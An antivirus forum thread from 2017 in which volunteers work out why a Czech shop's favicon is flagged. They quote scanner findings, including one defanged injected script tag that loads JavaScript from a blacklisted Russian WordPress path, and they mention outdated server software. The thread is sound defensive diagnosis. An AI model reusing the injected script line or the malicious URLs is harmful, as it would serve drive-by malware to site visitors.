Author Topic: HTML:Script-inf in website icon? (Read 4022 times)

Polda18 · « **on:** March 28, 2017, 12:22:42 PM »

Hello. It happened before on another website, now at this, as following detection pop-up shows:

Quote

Object: hxxp://www.zendl.cz/favicon.ico

Infection: HTML:Script-inf

Is it possible to infect website icon with a virus? VirusTotal analyses the website with 2 detections out of 64 as shown here: https://virustotal.com/cs/url/5c99b1fe2a847e03529823be42ccd3736300052907f1545e5ecc27fa7f70b429/analysis/1490696307/

It's a Czech military and hunting goods shopping website. Could anyone please inspect it for false positives? I can't believe website icon can be infected by malware. Thank you.

Asyn · « **Reply #1 on:** March 28, 2017, 12:27:55 PM »

-> https://sitecheck.sucuri.net/results/www.zendl.cz/favicon.ico

Pondus · « **Reply #2 on:** March 28, 2017, 01:06:21 PM »

Quote from: Asyn on March 28, 2017, 12:27:55 PM

-> https://sitecheck.sucuri.net/results/www.zendl.cz/favicon.ico

Malware entry: MW:BLACKLISTED:35
A suspicious code was identified loading content from a blacklisted domain

Malware entry: MW:BLK:2
The web site contains a remote javascript or iframe that is currently blacklisted.

polonus · « **Reply #3 on:** March 28, 2017, 01:42:51 PM »

Also being flagged by Google Safebrowsing: Flagged URLs found in: -http://www.zendl.cz/favicon.ico

1: -http://psy-ufa.ru/wp-includes/images/wlw/1/404.php -> Google Safe Browsing diagnostic page for this URL

Advisory provided by Google

Quote

If your page is loading content, images or scripts, from a site that is currently being flagged as suspicious by Google, it will generate a malware warning -- even if your site is not currently being flagged. About your only option is to remove that content until the site owners can get their site cleaned up and the warning removed.

10:
< script type="text/javascript" src=" hxtp://psy-ufa dot ru/wp-includes/images/wlw/1/4O4.php "> < /script>

Note: The script call above looks suspicious! It loads content from a flagged site.

polonus

Pondus · « **Reply #4 on:** March 28, 2017, 01:56:52 PM »

SUSPICIOUS >> http://www.UnmaskParasites.com/security-report/?page=www.zendl.cz/favicon.ico

Iframe seems to go here > psy-ufa.ru/
https://virustotal.com/en/url/6f2c38ce642975c218140be104f9fdc2ea978d3eaa24c906c327db93cd51c948/analysis/1490702235/

Sucuri > https://sitecheck.sucuri.net/results/psy-ufa.ru
This specific URL was identified in malicious campaigns to disseminate malware.

polonus · « **Reply #5 on:** March 28, 2017, 02:15:54 PM »

Well we have that all explained then. Confirmed here: https://urlscan.io/result/163c9bcc-7b91-491a-8634-bafcbd5cc3e5#summary

Furthermore from the response header we see exploitability like this:
-> http://forums.interworx.com/threads/8505-A-security-vulnerability-has-been-found-in-mod_watch

OpenSSH 5.1p1 Debian 5 (protocol 2.0) is also open to vulnnlImage hacking it seems (shellcode) and "mod_fastcgi/","2.4.6" seems outdated. So it certainly is in need of some 'hardening' there, to get it somewhat more secure against hackers.

pol

Asyn · « **Reply #6 on:** March 28, 2017, 02:21:15 PM »

Guys, no need to dig deeper here. The site is infected, that's it.

polonus · « **Reply #7 on:** March 28, 2017, 02:29:21 PM »

They could get somewhat more secure while they will find the Avast Prague headquarters round the corner ,
two hops on the metro....

Not digging deeper, just a good and sound advice.

polonus

Pondus · « **Reply #8 on:** March 28, 2017, 02:29:29 PM »

Quote from: Asyn on March 28, 2017, 02:21:15 PM

Guys, no need to dig deeper here. The site is infected, that's it.

You know us, we like digging all the way down

Asyn · « **Reply #9 on:** March 28, 2017, 02:35:51 PM »

Quote from: Pondus on March 28, 2017, 02:29:29 PM

Quote from: Asyn on March 28, 2017, 02:21:15 PM
Guys, no need to dig deeper here. The site is infected, that's it.
You know us, we like digging all the way down

Yeah I know, keep up the good work guys..!!

Polda18 · « **Reply #10 on:** March 28, 2017, 04:46:50 PM »

I don't understand that. Why it detects a malware in website icon? It appears it's not present. Does 404 page (loaded automatically when some link seems unreachable) contain malware? Looks like hacked websites. Should I contact webmaster to make him clean his sites and make them better safe?

Pondus · « **Reply #11 on:** March 28, 2017, 05:06:12 PM »

Quote from: Polda18 on March 28, 2017, 04:46:50 PM

I don't understand that. Why it detects a malware in website icon? It appears it's not present. Does 404 page (loaded automatically when some link seems unreachable) contain malware? Looks like hacked websites. Should I contact webmaster to make him clean his sites and make them better safe?

There is a link to a malicious domaine, see here >> https://forum.avast.com/index.php?topic=199705.msg1381539#msg1381539

yes you may contact website owner, and you may give him link to this topic

Polda18 · « **Reply #12 on:** March 28, 2017, 05:45:53 PM »

Okay, website owner contacted. Hope he will start fixing the issue soon

Thank you for help

Asyn · « **Reply #13 on:** March 28, 2017, 05:52:21 PM »

You're welcome.